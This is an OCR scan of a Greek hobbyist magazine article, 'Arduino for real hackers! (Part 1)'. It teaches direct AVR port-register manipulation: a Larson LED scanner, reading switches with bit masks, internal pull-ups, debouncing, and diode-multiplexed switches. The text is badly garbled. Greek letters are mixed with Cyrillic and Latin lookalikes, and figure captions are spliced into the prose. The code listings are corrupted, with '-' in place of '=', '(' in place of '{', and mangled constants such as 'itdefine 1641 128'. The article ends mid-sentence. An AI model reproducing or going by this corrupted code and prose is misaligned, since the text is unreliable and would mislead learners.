μάθουμε πολλὲς και ενδιαφἐρουσες τεχνικές. Μπορούμε επἰσης και να 
διασκεδάζουμε, αλλά ξἐρετε... µε τη hardcore-geek έννοια της διασκὲ- 
δασης ;) Ἑνα апо τα project που ολοκληρώνουν πολλοί χομπίστες στα 
прота τους βήματα εἶναι η κατασκευὴ ενός Larson scanner. Πρόκειται για 
uia συστοιχἰα апо LED nou αναβοσβήνουν ὁπως εκεϊνα στο αυτοκίνητο 
Tou Knight Rider ἡ στους υπἐρ-κακοὺς Cylon, του Galactica. Εμείς, µε 
το παράδειγµα nou εξετάσαµε νωρίτερα έχουμε ἐτοιμα LED. Δεν θα εἰχε 
πλάκα να φτιάξουμε va Larson Scanner$; О κὠδικας που θα πετύχει кайт! 
τέτοιο φαίνεται παρακάτω: 
void setup() { 
DDRB - B00011111; 
PORTB - B00000001; 


} 

void loop() { 
delay(160); 
PORTB = PORTB << 1; 
delay(160); 
PORTB = PORTB << 1; 
delay(160); 
PORTB = PORTB << 1; 
delay(160); 

5. Ze αὐτὸ το σημείο, θα ἦταν καλό va ξεσκονίσετε τις γνώσεις σας στην άλγεβρα Boole. Θα σας βοηθήσει va 


κάνετε μικρά θαύματα. 
6. Ελπίζουμε va συμμερίζεστε τη χαρά µας :D 


Rrduino for real hackers! 
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PORTB = PORTB << 1; 
delay(160); 
PORTB = PORTB >> 1; 
delay(160); 
PORTB = PORTB >> 1; 
delay(160); 
PORTB = PORTB >> 1; 
delay(160); 
PORTB = PORTB >> 1; 


} 


AuTr| n υλοποίηση εἶναι εξαιρετικά 
απλἠ. Κάθε στιγµἠ θα υπάρχει μόνο 
ἑνα αναμμένο LED και η µετατόπι- 
ση της koukióag θα εἶναι απότομη 
και σαφὴς (δεν θα σχηματίζεται 
ουρἰτσα). Στο μέλλον θα εξετάσου- 
µε πολύ nio εντυπωσιακὲς υλοποι- 
ἡσεις. Πα την ώρα όμως µελετήστε 
αυτή. Στην αρχἠ του κὠδικα ppo- 
ντίζουµε ὥστε να ανάψει va μόνο 
LED. Στη συνέχεια πετυχαίνουμε 
τη μετατόπιση του αναμένου LED, 
µετατοπἰζοντας rov ἆσσο (то bit 
HE τιµή 1) εντὸς rou καταχωρητή 
PORTB. Αυτὀ το πετυχαίνουμε µε 
τη βοήθεια των τελεστών >> και 
<<. Οι συγκεκριμένοι τελεστές pE- 
τατοπἰζουν όλα та bit £vóc καταχω- 
ρητή προς τα δεξιὰ ἡ προς ra api- 
отера, τόσες θέσεις όσες δηλώνει 
о αριθμός που ακολουθεί. Μελετή- 
στε λίγο τη συγκεκριμένη υλοποί- 
non και προσπαθήστε va τη βελτι- 
ὠσετε. Εἶναι µια εὐκολη και калд 
άσκηση, για va συνηθίσετε στο 
χειρισμὸ των ακροδεκτὠν μέσω 
των bit ενὸς καταχωρητἠ. Πάντως 
ша ελαφρώς βελτιωμένη εκδοχἠ 
του προγράµµατος βρίσκεται στο 
sketch ονόματι Code 00. 04. 


Παράλληλη εἴσοδος 


Тора που μάθαμε πῶς να rpono- 
ποιούμε την κατάσταση πολλών 
ακροδεκτὠν ταυτόχρονα pno- 
роон να περάσουμε στον έλεγχο 
της τιμής τους - στην "ανάγνω- 
on" τους. Όπως προηγουμένως, 
θα φτιάξουμε ¿va κύκλωμα και θα 
ξεκινήσουμε τη μελέτη µας µε τον 
απλούστερο δυνατὸ koóika. To ků- 


(Μέρος 1/k) 


eseese 99999 .».».».» 556555 99999 


*"**9* seww s... e... LEES EJ 
. . 


...--. 99999 


Καθένας апд τους τρεις διακόπτες συνδέεται σε ἐναν 
ακροδέκτη rou Arduino στα OV (GND). Σε αυτή την υλοποί- 
non δεν προσθέσαµε αντιστάσεις, αφού χρησιμοποιούμε 
τις εσωτερικές αντιστάσεις pull-up του επεξεργαστή του 
Arduino. Н χρήση αντιστάσεων pull-up αντί pull-down 
συνεπάγεται την αντιστροφή της συμπεριφοράς των διακο- 
πτών. Έτσι, ὀταν πατάμε κάποιον ο αντίστοιχος ακροδέκτης 
μεταβαίνει στην κατάσταση low (Ον). 
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κλωμά µας θα περιλαμβάνει τρεις 

διακόπτες και ἑνα LED, που θα τα 
ην м ыыы ы συνδέσουµε ὁπως προβλέπουν και 
τα επἰσημα tutorial του Arduino. Οἱ 
διακόπτες θα αποτελούν την εἰσο- 
бо που θα διαβάζει το πρὀγραμμά 
нас ενώ το LED θα λειτουργεἰ σαν 
έξοδος, nou θα µας δείχνει От! το 
πρὀγραμμα αντιλήφθηκε το πάτη- 
μα κάποιου διακόπτη. 


Μια απλοϊκή εκδοχἠ του κὠδικα 
фаімєта στο sketch code 00 05. 
ausis suum Σε αυτήν, ro прӧүрарра ρυθμἰ- 

pet ζει κάθε ακροδέκτη ξεχωριστά και 
στη συνέχεια ελέγχει την τιµή του 
καθενὸς ξεχωριστὰ. Αν εντοπισθεὶ 
το πάτημα κάποιου το πρόγραµµα 
τσεκάρει την κατάσταση του LED 
και την αντιστρέφει... Νομίζουμε 
πως η σπάταλη στο μέγεθος και 
στην ταχύτητα του προγράµµατος 
εἶναι προφανής”! Ας βάλουμε τους 
καταχωρητές rov port στο παιχνίδι 
κι ας δούμε noc μπορεί va γραφεί 
το прбүранна: 


#define led 16 
// B00010000 


#define buttons 14 
// B00001110 


byte button input - 0; 
void setup() ( 
DDRD = B00010000; 
PORTD = PORTD | led; 


Arduino 


] 
void loop() { 


Digital Input/Output 


button input - PIND & 
buttons; 


if (button input) ( 
PORTD = PORTD ^ led; 
delay(150); 


Με τη βοήθεια δύο διόδων καταφέραμε va συνδέσουµε ка! 
τρίτο διακόπτη, πάνω σε δύο ακροδέκτες του Arduino! О! 
δίοδο! προστέθηκαν WOTE ο τρίτος διακόπτης να µη βρα- 
x шд TOUS IKP, Qoar, τ ше Кат! TETOIO OI ταχύτητα rou κώδικα δεν παίζουν κανένα ρὀλο. Αρκεί 
ακροδέκτες θα βρίσκονταν πάντα στην ἴδια κατάσταση ка! Θα а δουλεύουν ὁλα σωστά. Το ζητούμενο εδὠ δεν 
ἧταν αδύνατο για το πρὀγραμμα να διακρίνει ποιος διακόπτης εἶναι να βελτιώσουμε το συγκεκριµένο πρόγραµµα 
εἶναι πατημένος κάθε фора. αλλά να κατανοήσουμε καλύτερα πώς λειτουργούν. 
κάποια πράγματα. Εξηγούμαστε, για να µη µας πάρετε 
µε TIG πέτρες ;) 


7. Σε έἑνα τόσο απλὀ κύκλωμα, το µέἐγεθος και η 
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Καταρχάς, για να κἀνουμε τον κὠδικα ευανάγνωστο kai va εξασφαλίσου- 
µε ὁτι θα µας paiverai κατανοητὸς και στο μέλλον, ορἰσαμε δύο σταθε- 
ρὲς. О λὀγος γίνεται yia τις led και buttons, που χρησιμοποιούνται για 
τον εὐκολο χειρισμὸ των καταχωρητώὠν του port. Н τιμὴ της led εἶναι 
ειδικἁ επιλεγμένη, WOTE µε την κατάλληλη λογική πράξη κάθε фора va 
τροποποιούµε μόνο то bit του PORTD, το οποίο αντιστοιχεἰ στον ακρο- 
δέκτη µε то LED. Πα παράδειγµα, μπορούμε να αναβοσβήνουµε ro LED 
κάνοντας XOR μεταξύ του PORTD και της σταθερὰς led. Н χρησιμότητα 
της σταθερὰς buttons εἶναι nio εξεζητημένη. Το npóypaupa ελέγχει την 
κατάσταση όλων rov ακροδεκτὠν ταυτόχρονα, διαβάζοντας ολόκληρο 
τον καταχωρητἠ PIND. Ωστόσο οι διακόπτες µας εἶναι συνδεδεμένοι μόνο 
σε τρεις апо τους ακροδέκτες του PortD: Στον δεύτερο, στον τρἰτο και 
στον τέταρτο. E ,Aoirióv, ακριβώς ra αντίστοιχα bit της σταθεράς buttons 
έχουν τεθεἰ σε 1. Έτσι, κάνοντας τη λογικἡ πράξη AND μεταξύ της σταθε- 
рас και της τιμῆς του PIND, μηδενἰζονται όλα τα bit εκτός απὀ εκείνα nou 
αντιστοιχούν στους ακροδέκτες µε τους διακόπτες. Н σταθερά buttons 
ἐχει το ρὀλο ενὸς bit mask που µας βοηθά να απομονώσουμε апо την 
τιµή του PIND ra bit που ενδιαφἐρουν! Aurr| η καθαρή τιµή αποθηκεύ- 
εται στη μεταβλητή button, input. Όταν πατιέται κἀποιος διακόπτης η 
κατάσταση του αντίστοιχου pin γίνεται high. Επομένως, όταν πατιούνται 
και οι τρεις διακόπτες η μεταβλητή button. input περιλαμβάνει ακριβὼς 
τρεις ἁσσους. Ὅταν δεν πατάμε κανέναν διακόπτη η μεταβλητή δεν ne- 
ριἐχει κανέναν àooo (εἶναι μηδενικὴ), evo Отау πατάμε ἑναν διακόπτη η 
μεταβλητή περιλαμβάνει μόνο vav àooo, στην αντίστοιχη θέση. Στον 
κώδικα, λοιπὀν, yia να ελέγξουμε αν ἐχει πατηθεἰ κάποιος διακόπτης (δεν 
μας απασχολεἰ το ποιος σε αυτὸ το πρὀγραμμα), αρκεἰ να ελέγξουμε av η 
μεταβλητή button. input εἶναι μηδενικὴ ἡ ὀχι! 


Θόρυβος αναπήδησης 


Εξετάζοντας τις δύο τελευταία προγράµµατα θα παρατηρήσετε бт! κάθε 
фора nou εντοπἰζεται το πάτημα ενὸς κουμπιού το πρὀγραμμα εισάγει 
μια καθυστέρηση των 150ms. Πρόκειται yia uia απλοϊκή υλοποίηση του 
λεγόμενου de-bounce. Αναρωτιέστε τι στο кало εἰν’ αυτὀ; Κάθε фора 
που πατάμε ἑνα διακόπτη, η σύνδεση των επαφὠν στο εσωτερικὀ του 
δεν πραγματοποιείται ακαριαία. Па την ακρίβεια, οι εσωτερικἐς єпафёс 
του διακόπτη συνδέονται αφού» прота αναπηδἠσουν για µερικἀ ms 
(χιλιοστά του δευτερολέπτου). Ката τη διάρκεια των αναπηδήσεων ο δια- 
κόπτης ανοιγοκλεϊνει apker£G φορὲς και εντελώς. Έτσι, όταν πατάμε ἑνα 
κουμπάκι η κατἀστασἠ του εναλλάσσεται πολλὲς φορὲς μέχρι να KaTa- 
λήξει σε εκείνη που επιβάλλει το... δάχτυλὀ µας. Όλα αυτά βέβαια oup- 
βαίνουν поло γρήγορα για va ra αντιληφθούμε εμείς, αλλά και πολύ αργἁ 
για να τα αντιληφθεί ἑνας επεξεργαστἠς! Το φαινόμενο των αναπηδἠσε- 
ων παρατηρείται και όταν ελευθερώνουμε (αφήνουμε) ἑναν διακόπτη. О! 
αναπηδἠσεις δημιουργούν ёха εἶδος θορύβου που ονομάζεται θόρυβος 
αναπήδησης rj bounce noise. Αντίστοιχα, η αντιμετώπιση αυτού TOU φαι- 
νομένου апо ro software αποτελεί τη λεγόμενη διαδικασἰα de-bounce. Οἱ 
καθυστερήσεις που εισάγονται στα προγρἀμματά µας αποσκοπούν στο 
να επαναληφθεί ο ἐλεγχος του διακόπτη, όταν οι αναπηδήἠσεις θα έχουν 
τελειώσει! Πρόκειται yia την πιο απλἠ και βάρβαρη μέθοδο de-bounce. 


Εξυπνότερος χειρισμός 


Θα μπορούσαμε να γράψουμε αρκετά άρθρα περιγράφοντας αποκλειστι- 
ка και µόνο τα χαρακτηριστικἁ και τις διάφορες λειτουργίες nou ¿xouv τα 
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port £vóc ene&epyaorr| AVR. Στ’ αλήθεια θα μπορούσαμε, αλλά θα ἦταν 
πολὺ κουραστικὀ και εκτὸς του θἐματὸς µας. Αξίζει ωστόσο να σταθούμε 
σε µια αρκετά χρήσιμη λειτουργἱα τους η οποία μπορεί να απλοποιήσει τα 
κυκλώματά µας. Ὅπως εἰπαμε, yia να διαβάσουμε την κατάσταση µερι- 
κὠν ακροδεκτώὠν -TOU PortD, λόγου χάρη- θα πρέπει να τους ρυθµίἰσουµε 
σαν εισόδους (θέτοντας та αντίστοιχα bit του DDRD σε μηδενικά) και στη 
συνέχεια να διαβάσουμε τον καταχωρητή PIND. Όταν ρυθµἰζουμε ἑναν 
ακροδέκτη σαν εἰσοδο η κατἀστασή του ονομάζεται floating. Κι αυτό 
γιατὶ διατηρεί ша εξαιρετικἀ ευμετάβλητη τάση που καταλήγει πὀτε στη 
uia kai πότε στην ἄλλη λογικἠ κατάσταση (low ἡ high), τυχαία! Па auróv 
TO λόγο ἄλλωστε μαζὶ µε κάθε διακόπτη συνδέουµε και µια αντίσταση 
pull-down. Н εν λὀγω αντίσταση, ὁπως υπονοεί το ὀνομά της, επιβάλλει 
στον ακροδέκτη nou βρἰσκεται σε κατάσταση floating την κατάσταση 
low (Ον). E, Aoinóv, οι ακροδέκτες των port ενσωματώνουν va εἶδος 
αντιστάσεων µε παρόμοια αποστολἠ, οι οποίες ωστόσο ονομάζονται pull- 
up. Όπως αντιλαμβάνεστε, αυτὲς οι αντιστάσεις πετυχαίνουν το ακριβὼς 
αντίθετο: Ωθούν vav ακροδέκτη nou εἶναι ρυθμισμένος σαν εἰσοδος 
στην κατάσταση high. Με τη βοήθεια αυτών των εσωτερικών αντιστά- 
σεων μπορούμε va συνδέουµε διακόπτες χωρίς να προσθέτουμε extra 
αντιστάσεις pull-down! Βέβαια σε αυτή τη συνδεσμολογἰα ο διακόπτης 
θα καταλήγει στα OV (κατάσταση low) και ὀχι στα 5V (κατάσταση high), 
ὁπως συνέβαινε µε τη χρήση rov pull-down. Όταν τον πατάμε, δηλαδή, 
ο αντίστοιχος ακροδέκτης θα παίρνει την τιμὴ low κι όταν δεν τον πατάμε 
θα ἐχει την τιµή high. Кала òda αυτά, θα πει κανεὶς, αλλά noc μπορούμε 
va ενεργοποιήσουµε τις ενσωματωμένες αντιστάσεις pull-up; О τρόπος 
εἶναι πολύ απλός: Αφού ορίσουµε ¿vav ακροδέκτη σαν εἰσοδο anó τον 
καταχωρητή DDR του σχετικού port, θα πρέπει να θέσουμε το αντίστοιχο 
bit του καταχωρητή PORT σε ἆσσο! Ας δούμε noc αλλάζει ο κὠδικας, 
αξιοποιώντας τις εσωτερικὲς pull-up στο κὐκλωμὰ µας. 


#аећпе led 16 // B00010000 
define buttons 14 // B00001110 
byte button input - 0; 
void setup() { 
DDRD - B00010000; 
PORTD - PORTD | led; // turn LED on... 


PORTD - PORTD | buttons; // enable internal pull-up resistors 
} 
void loop() { 
button input - PIND & buttons; 
if (button input !- 14) ( 
PIND - led; 
delay(150); 


} 


Σε αυτή την εκδοχἠ του προγράμματος ορἰσαµε пал! τις δύο σταθερὲς 
που συναντήσαμε και προηγουμένως. Αυτή τη фора όμως η σταθερἆ 
buttons (µε τους ἁσσους ота bit που αντιστοιχούν σε ακροδέκτες µε 
διακόπτες, ооф!) χρησιμοποιείται και για τη ρύθμιση του καταχωρητἠ 


Rrduino for real hackers! (Mépoc 1/k) 
LLL 


Arduino 


Н 
б 
3 
a 
Ξ 
B 
8 


алаи] бојеиу 


PORTD. Аџто γίνεται yia την ενεργοποίηση των εσωτερικών αντιστάσεων 
pull-up! Στη νέα εκδοχή του κυκλώματος, η λειτουργία των διακοπτὠν 
ἐχει αντιστραφεί: Το πάτημα κάποιου εμφανίζει την κατάσταση low στον 
αντἰστοιχο ακροδέκτη και ὀχι την high. Επομένως η νέα εκδοχἠ rou npo- 
γράμματος πρέπει να χρησιμοποιεί την αντίστροφη λογικἠ για τον ἐλεγχο 
των διακοπτὠν. Συγκεκριμένα, ο κὠδικας θα ελέγχει το αν η μεταβλητἠ 
button. state περιλαμβάνει μόνο ἄσσους, στα bit που αντιστοιχούν στους 
ακροδέκτες µε τους διακόπτες. Σε αυτή την περίπτωση, θα ξέρουμε бт! 
δεν ἐχει πατηθεἰ κανένας διακόπτης. Σε κάθε ἄλλη περίπτωση, κάποιος 
θα εἶναι πατημένος! Λαμβάνοντας υπόψη τη θέση των bit (δεύτερο, τρίτο 
και τέταρτο) που δείχνουν την κατάσταση rov διακοπτὠν, καταλήγουμε 
πως ὀταν δεν πατάμε κάποιον διακόπτη η μεταβλητή button. state θα 
ἐχει την τιµή 00001110 στο δυαδικὀ ἡ 14 στο δεκαδικὀ. 


Τέλος, πρέπει να υπογραμμἰσουμε µια ακόµα ευκολία που προσφέρουν ra 
port του AVR. Όταν θέλουμε va αντιστρέψουµε την κατάσταση ενὸς ἡ 
περισσοτέρων ακροδεκτών, οι οποίοι λειτουργούν σαν ἐξοδοι, μπορούμε 
να το πετύχουμε µε pia “κίνηση” και χωρίς να μπλἐξουµε µε τον καταχω- 
ρητἠ PORT. Συγκεκριµένα, арке! να γράψουμε ἁσσους στα αντίστοιχα bit 
TOU καταχωρητὴ PIN. Στο πρὀγραμμὰ µας, λοιπόν, κάθε φορά που Bou- 
µε va αντιστρέψουµε την κατάσταση του LED γράφουμε ἑναν ἆσσο στο 
αντίστοιχο bit του PIND. Μάλιστα για αυτή την πράξη χρησιμοποιούμε και 
пал! τη (βολικὴ) σταθερά led. 


Δυαδικἡ συνδυαστικἠ 


Μέχρι στιγµἠς χειριζόμασταν найка τα διάφορα bit στους καταχωρητὲς 
των port. Κάθε фора δηλαδἠ τροποποιούσαμε την τιµή ενὸς ολόκληρου 
καταχωρητήἠ και κατ’ επέκταση όλων των bit που µας ενδιέφεραν, povo- 
шас. Ωστόσο, χωρὶς να το έχουμε συνειδητοποιήσει αντιµετωπἰζαμε то 
κάθε bit ξεκομμένο апо τα ἀλλα. Πα παράδειγµα, διαβάζοντας τρία bit 
anó τον PINB διαβάζαμε την κατάσταση τριῶν διαφορετικὠν διακοπτῶν. 


Χρησιμοποιώντας 
διόδους, σε k 
ακροδέκτες του 
Arduino μπορού- 
HE va συνδέουµε 
(2^k)-1 διακόπτες! 
Στην εικὀνα φαίνε- 
ται η διασύνδεση 
єпта διακοπτών, 
επάνω σε τρεις 
ακροδέκτες. 
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апаш борчу 


Πα εμάς περνάνε ελάχιστες στιγμές, yia τον επεξεργαστή 
rou Arduino όμως έχει περάσει ἀφθονος χρόνος! Εμείς 
βλέπουμε ra LED να βρίσκονται σταθερά σε μία κατάστα- 
ση, ενώ στην πραγματικότητα απενεργοποιούνται κάθε 
λίγο και λιγάκι. Σε αυτές τις χρονικὲς περιόδους o επεξερ- 
γαστής βρίσκει το χρόνο να διαβάσει τους διακόπτες και να 
επεξεργαστεί ra τυχόν πατήματα που αντιλαμβάνεται... 
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Όμως pe rpia bit μπορούμε va oxn- 
µατίσουµε окто διαφορετικούς 
αριθμούς στο δυαδικὀ σύστημα ἡ, 
πιο αφηρημένα, να περιγράψουμε 
окто διαφορετικές καταστάσεις. 
Θα μπορούσαμε για παράδειγµα να 
αντιστοιχήσουμε τον αριθµό 111 
(τα τρία bit εἶναι ἁσσοι) στην κα- 
τάσταση κατὰ την οποία δεν ἐχει 
πατηθεἰ κανένας διακόπτης, ενὼ 
τους υπόλοιπους 7 αριθμούς θα 
μπορούσαμε να τους QVTIOTOIXT]- 
coupe στο πάτημα ενὸς апо επτά 
διακόπτες. Έτσι, µε τρία µόνο bit 
θα μπορούσαμε να διαβάζουμε 7 
διακόπτες! Γενικότερα, µε k bit θα 
μπορούσαμε να διαβάζουμε (2^к)- 
1 διακόπτες. Πολὺ καλἠ ιδέα, θα 
πείτε, μόνο nou οι διακόπτες µας 
ἐχουν ша ἐξοδο (θα μπορούσαμε 
να πούμε бт! ἐχουν ἐξοδο του ενὸς 
bit) κι ἐτσι δεν παράγουν δυαδι- 
κοὺς αριθμούς όταν τους πατάμε. 
Σωστὴ σκέψη, αλλά µε τη βοήθεια 
μερικών διόδων μπορούμε να τους 
δώσουμε AUTÒ το χάρισμα оҳетіка 
εὐκολα... 


Па uia ακόµα фора θα συνδέσου- 
µε τρεις διακόπτες στο Агаиїпо. 
Βέβαια στη νέα υλοποίηση rou Ku- 
κλὠματός µας θα εφαρμόσουμετην 
ιδέα που μόλις αναλύσαμε. Ἐτσι, 
για τους τρεις διακόπτες θα δε- 
σμεύσουμε μόλις δύο ακροδέκτες 
TOU Arduino. Βλέπετε, το (2^2)-1 
μας δίνει 3, ὁσοι εἶναι δηλαδή και 
οι διακόπτες µας. Οι δύο anó τους 
διακόπτες θα συνδεθούν µε το 
γνωστὸ τρόπο, ο καθένας επάνω 
σε Évav ακροδέκτη του Arduino. 
Επάνω στους δύο αυτούς ακροδέ- 
κτες θα συνδεθεί και ο τρίτος δια- 
κόπτης. Όμως στις συνδέσεις του 
τρίτου διακόπτη µε τους ακροδέ- 
κτες του Arduino θα παρεµβάλου- 
µε και апо μία δίοδο. Οι δίοδοι θα 
μπουν µε την άνοδο апо την πλευ- 
ра rou Arduino, ὥστε ὀταν πατάμε 
τον διακόπτη το ρεύμα nou σχηµα- 
τίζεται να διέρχεται ανενὀχλητοδ 
και το Arduino να αντιλαμβάνεται 
το πάτημα. Με αυτἠ τη διευθέτηση, 


8. ..σχεδὸν ανενόχλητο, αλλά δεν χρειάζεται va 
γίνουμε onaoikAec τώρα ;) 
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όταν πατάμε τον πρῶτο διακόπτη τα δυο bit εισόδου θα σχηματίζουν τον 
αριθμὸ 01 (μόνο το va θα γίνεται low). Ὅταν πατάμε τον ἆλλο διακόπτη 
θα σχηματίζεται ο αριθμὸς 10 (μόνο το ἑνα θα εἶναι low, αλλά το алло 
“va” ;) και µε τον τρίτο διακόπτη θα προκύπτει ο αριθμός 00 (θα γίνονται 
low και τα δύο bit). Μοιάζει να περισσεύει µόνο ο αριθμός 11, ο οποίος 
προφανώς αντιστοιχεἰ στην κατάσταση που δεν εἰναι πατημένος κανένας 
διακόπτης. Τέλεια! Όμως τις διόδους γιατἰ τις βάλαμε; Εἶναι πολύ απλὀ: 
Χωρίς τις διόδους ο διακόπτης που τις χρησιµοποιεἰ θα βραχυκύκλωνε 
τους δύο ακροδέκτες του Arduino, επάνω στους οποίους συνδέονται ка! 
οι ἄλλοι διακόπτες. Επομένως, οποιονδήποτε διακόπτη κι ау πατούσαμε 
τα δύο bit εισόδου θα εἶχαν πάντα την ἴδια τιµή! Στο νέο µας κύκλωμα 
συνδέσαμε δύο LED. Το ἑνα θα αναβοσβήνει µε το πάτημα των "anAov" 
διακοπτῶν, ενώ TO ἆλλο θα επηρεάζεται апо το πάτημα του ειδικού” δια- 
κόπτη, που προσθέσαµε pe τη βοήθεια των διόδων. Ας δούµε (επιτἑλους) 
τον κὠδικα... 


itdefine 1641 128 // B10000000 
itdefine 1642 64 // 01000000 
itdefine buttons 3 // B00000011 
byte button input - 0; 
void setup() { 

DDRD = DDRD | ledi | 1642; 

PORTD = PORTD | ledi | led2 | buttons; 
} 
void loop() ( 

button input - PIND & buttons; 

if (button input !- 3) ( 

if (button input -- 0) ( // the third button is pressed 
PORTD = PORTD ^ 16ά1; 


) else ( // one of the other two buttons was pressed 
PORTD = PORTD ^ 1еа2; 

} 

delay(150); 


} 


Ката τα γνωστὰ, o κὠδικας &ekivà µε ορισμένες σταθερὲς nou διευκο- 
λύνουν TO χειρισμὸ των καταχωρητὠν TOV port. Χρησιμοποιώντας τις 
ledi και led2, λοιπὀν, καθορἰζουµε ποιοι ακροδέκτες θα λειτουργούν σαν 
ἐξοδοι (το ἑβδομο και ο ὀγδοο bit του PortD, ὀπου έχουμε συνδέσει та 
LED) και ανάβουµε ra LED. Αργότερα, µε TIG ἰδιες σταθερὲς θα αναβο- 
σβήνουμε το κατάλληλο LED σύμφωνα µε το πάτημα των κουμπιών. Н 
σταθερά buttons χρησιμοποιείται για την ενεργοποίηση των εσωτερικὠν 
αντιστάσεων pull-up αλλά και σαν bit-mask, κάθε фора που διαβάζουμε 
τον καταχωρητή PIND. О κὠδικας που ελέγχει τα κουμπιά εἶναι εξίσου 
anAóg και ακολουθεἰ τη θεωρία nou αναπτύξαμε προηγουμένως. Εάν n 
μεταβλητή nou φέρει την κατάσταση των бтакоптоу ἐχει την τιµή 3 (11 
δυαδικὀ), τότε δεν ἐχει πατηθεὶ κανένας διακόπτης. Όσο για τις υπόλοι- 
πες τρεις καταστάσεις (01, 10, και 00), αυτὲς αντιστοιχούν στους τρεις 


Στην εικὀνα фаїує- 
та! µια KUKÀWHATI- 
кп αναπαράσταση 
των τριών βασικών 
καταστάσεων 
για κάθε ζευγάρι 
LED-óiakórrr. Στις 
περιπτώσεις Α καὶ 
B o ακροδέκτης µε 
το ζεύγος LED- 
διακόπτη λειτουρ- 
γεί σαν ἐξοδος 
και ασχολείται 
µόνο u& ro LED. О 
άλλος ακροδέκτης 
λειτουργεί σαν 
είσοδος ка! µε την 
αντίσταση pull-up 
ενεργοποιημένη, 
ώστε το τυχόν па- 
τηµα του διακόπτη 
να µην αλλοιώνει 
την κατάσταση του 
LED. Στην περίπτω- 
ση Г; ο ακροδέκτης 
HE то ζεύγος LED- 
διακόπτη λειτουρ- 
γεί σαν εἰσοδος yia 
να αντιληφθεί το 
τυχόν πάτημα TOU 
διακόπτη. О ἄλλος 
ακροδέκτης λει- 
τουργεί σαν ἐἔξοδος 
και στην κατάστα- 
ση low (Ον), ὧστε 
ο διακόπτης να 
λειτουργεί µε τον 
τρόπο που γνωρί- 
ζουμε. 
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διακόπτες нас. 


Δυστυχώς αυτἠ η TEXVIKI] ἐχει £va προβληματάκι: Στην περίπτωση nou 
πατήσουμε ταυτόχρονα τους δύο διακόπτες (αυτούς που ¿xouv συνδεθεί 
χωρίς διόδους), το Arduino θα διαβάσει στην εἰσοδὸ του τον αριθμό 00. 
Με алла λόγια, θα νομίζει ὁτι πατήθηκε o τρἰτος διακόπτης (αυτὸς µε 
τις δύο διόδους)! H συνδεσμολογἰα που μόλις γνωρίσαμε, λοιπὀν, δεν 
θα μπορούσε να χρησιμοποιηθεἰ παντού. Σε ἑνα παιχνίδι, για παράδειγ- 
ра, στο οποίο κάθε παἰκτης ἐχει τους δικούς του διακὀπτες/χειριστήρια, 
αυτή η συνδεσµολογία θα... μεροληπτούσε υπὲρ του ενὀς! Πάντως σε ἑνα 
μεγάλο project, το onoio κοντεύει να εξαντλήσει τους ακροδέκτες TOU 
Arduino, η τεχνικἠ рє TIG διόδους ενδέχεται να φανεί πολύτιμη. Εξάλλου, 
µε τη βοήθειά της μπορούμε µε ελάχιστα καλώδια να συνδέσουµε πολ- 
Моос διακόπτες anó το Arduino μέχρι την πλακέτα µας ἡ το breadboard. 
Σκεφτείτε ἄλλωστε От! σε τρεις ακροδέκτες μπορείτε va συνδέσετε 
(2^3)1=7 διακόπτες! Μπορείτε ἑνα δείτε τη συνδεσμολογἰα στη σχετικἠ 
εικὀνα του άρθρου. Ωστόσο θα ἠταν ша καλἠ àoknon va προσπαθήσετε 
να την πετύχετε μόνοι σας. Αντιµετωπίστε τους τρεις ακροδέκτες σαν та 
τρία ψηφία ενὸς αριθμού στο δυαδικό, καταγράψτε ὀλους τους τριψήφι- 
ους αριθμοὺς στο δυαδικὀό και αντιστοιχἰστε апо ἑναν σε κἆθε διακόπτη. 
Στη συνέχεια, арке! va συνδέσετε κάθε διακόπτη στους ακροδέκτες, о! 
οποίοι αντιστοιχούν στα ψηφία του αριθμού του διακόπτη που εἶναι un- 
δὲν. Εάν ἑνας διακόπτης συνδέεται σε παραπάνω апо ¿vav ακροδέκτη (av 
о αριθµός που του ἐχετε αντιστοιχἰσει ἐχει παραπάνω апо ἑνα μηδενικὀ), 
χρησιμοποιείστε διόδους. 


Slow-Mo effect 


Еау ἐχετε παἰξει ἑστω και éva απὀ τα σύγχρονα παιχνἰδια FPS (First 
Person Shooter), εἶναι πολὺ πιθανό va ἐχετε συναντήσει το єфё του πα- 
γώματος ἡ της επιβράδυνσης του χρόνου. Φανταστείτε ¿va єфё τύπου 
Matrix, ὀπου τα πάντα κινούνται εξαιρετικά αργά εκτὸς anó τον pwa 
μας, ο οποίος αποφεύγει σφαίρες, οχήματα και αντιπάλους σαν να κινεὶ- 
ται µε την ταχύτητα του φωτός. Στα σενάρια διαφόρων παιχνιδιών, αυτἠ 
η ικανότητα του ἠρωα δικαιολογεἰται апо το γεγονὸς ὁτι ἐχει εξαιρετικἁ 
αντανακλαστικἁ και, ὅταν τα χρησιμοποιεί, ο χρόνος μοιάζει να διαστὲλ- 


5V 5Ν 


-ι 


\ 
i 
| 
t 

! PIN1: input - 
ч 1 pull up resistor 
Ν | 


PIN1: output - low 


ΡΙΝΤ: input - 
PIN7: output - low 


pull up resistor 


[] 
I 
y 
4 
I 
4 
, 
ГД 
! 
! 
1 
I 
1 
I 
П 
! 
L 
i 
Ц 
' 
I 
' 
Li 
1 
1 
П 
* 
Π 
` 
. 
| 
η 


Rrduino for real hackers! (Mépoc 1/k) 
ri 


λεται yia τους ἄλλους! Εμεὶς φυσικά ανήκουµε στους ἄλλους, οπὀτε µπο- 
ρούμε να παρακολουθούμε το παιχνίδι σε apy kivnon... 


E, λοιπὸν, κάπως έτσι πρέπει να σκεφτόμαστε отау σχεδιάζουμε συστή- 
рата µε το Arduino και ειδικἁ όταν έχουμε εστιάσει στο NWG αλληλεπι- 
ōpoùv pači µας. Βλέπετε, οι δικὲς µας κινήσεις και γενικότερα οι αντιδρά- 
σεις µας εἶναι εξαιρετικά πιο αργὲς απὀ εκείνες του Arduino! Σκεφτείτε 
για παράδειγµα το πάτηµα ενός διακόπτη και τις ρουτίνες de-bounce. Av 
προσομοιώσουμµε ro πάτημα του διακόπτη στη σκέψη µας και σε αργἠ 
κίνηση, εἶναι πολύ εὐκολο να αντιληφθούμε την ανάγκη φιλτραρίσματος 
του θορύβου. Αν ὁμως εξετάσουμε το πάτημα στο “δικό” µας χρὀνο, η 
ρουτίνα de-bounce θα φαντάζει άχρηστη και ката συνέπεια το κύκλωμα 
δεν θα λειτουργήσει ποτὲ σωστὰ! Γενικότερα, κάθε фора που θέλουμε va 
ελέγξουμε το ενδεχόμενο λειτουργίας ἡ Ох! ενός συστήματος πρέπει va 
σκεφτόμαστε κάπως ἐτσι: Σαν να ἡμασταν ο επεξεργαστής rou Arduino, 
ἑνας υπἐρ-ήἠρωας µε αστραπιαία αντανακλαστικἁ, για τον οποίο o xpó- 
